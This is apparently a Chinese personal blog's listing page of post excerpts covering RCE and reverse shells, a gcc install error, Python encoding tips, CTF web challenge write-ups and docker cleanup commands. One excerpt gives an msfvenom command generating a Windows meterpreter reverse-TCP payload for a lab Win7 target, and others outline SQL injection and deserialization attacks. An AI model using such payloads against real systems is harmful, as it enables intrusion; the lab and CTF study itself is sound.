摘要: RCE、反弹shell 阅读全文
posted @ 2021-07-20 10:36 山野村夫z1 阅读(59) 评论(0) 推荐(0) 编辑
摘要: RCE、反弹shell 阅读全文
posted @ 2021-07-20 10:28 山野村夫z1 阅读(81) 评论(0) 推荐(1) 编辑
摘要: 直接apt安装 apt install gcc 报错 libc6-dev : 破坏: libgcc-9-dev (< 9.3.0-5~) 但是 9.2.1-22 正要被安装 E: 错误,pkgProblemResolver::Resolve 发生故障,这可能是有软件包被要求保持现状的缘故。 按照网上 阅读全文
posted @ 2021-06-03 23:06 山野村夫z1 阅读(407) 评论(0) 推荐(0) 编辑
摘要: 利用python的pinyin库转 import pinyin print(pinyin.get('你好',format='strip')) #去掉声调 fire1 = open('456.txt','r',encoding='utf-8') fire2 = open('姓名字典.txt','w', 阅读全文
posted @ 2021-03-05 19:44 山野村夫z1 阅读(207) 评论(0) 推荐(0) 编辑
摘要: 1.方法1 指定编码为utf-8 response = requests.get(url=url) response.encoding= 'utf-8' page_text = response.text 2.方法2 重新编码再解码 img_name = img_name.encode('iso-8 阅读全文
posted @ 2021-02-24 16:45 山野村夫z1 阅读(303) 评论(0) 推荐(0) 编辑
摘要: 靶机信息 win7 sp1 64位 先关闭win7上的防火墙 利用msfvenom生成meterpreter反弹shell msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.182.128 lport=23333 -f exe 阅读全文
posted @ 2021-02-22 15:58 山野村夫z1 阅读(246) 评论(0) 推荐(0) 编辑
摘要: 注册用了邮箱、账户名、密码,登录只用了邮箱和密码,登录进去后账户名显示出来了,推测存在二次注入 过滤了逗号和information,无法使用information_schema,猜测flag在flag表中 上脚本 #coding:utf-8 import requests from bs4 impo 阅读全文
posted @ 2021-02-06 10:31 山野村夫z1 阅读(972) 评论(0) 推荐(0) 编辑
摘要: 提示有源码泄露 下载下来后,发现有3000多个文件,做了大量的混淆 推测其中有能执行的php文件 嫖一个一叶飘零大佬的脚本 大致思想是找出$_GET[]里边的参数,然后去执行,类似于$_GET['a'] = echo "sky cool",如果回显中存在sky cool,则该shell能执行 15个 阅读全文
posted @ 2021-02-04 22:23 山野村夫z1 阅读(410) 评论(0) 推荐(0) 编辑
摘要: 初始页面如下 注册一个账号登录 可以上传文件,但是上传后的文件后缀都会改成png 抓包发现cookie为base64 解码为序列化数据a:5:{s:2:"ID";i:8;s:8:"username";s:7:"asdaszz";s:5:"email";s:8:"7@qq.com";s:8:"pass 阅读全文
posted @ 2021-02-04 10:01 山野村夫z1 阅读(223) 评论(0) 推荐(0) 编辑
摘要: #列出容器id,去掉CONTAINER ID字符串 docker ps -a | awk '{if($1!~/^CONT/) print $1}' #列出已开容器并删除 docker ps -a | awk '{if($1!~/^CONT/) print $1}' | xargs docker rm 阅读全文
posted @ 2021-01-25 22:31 山野村夫z1 阅读(319) 评论(0) 推荐(0) 编辑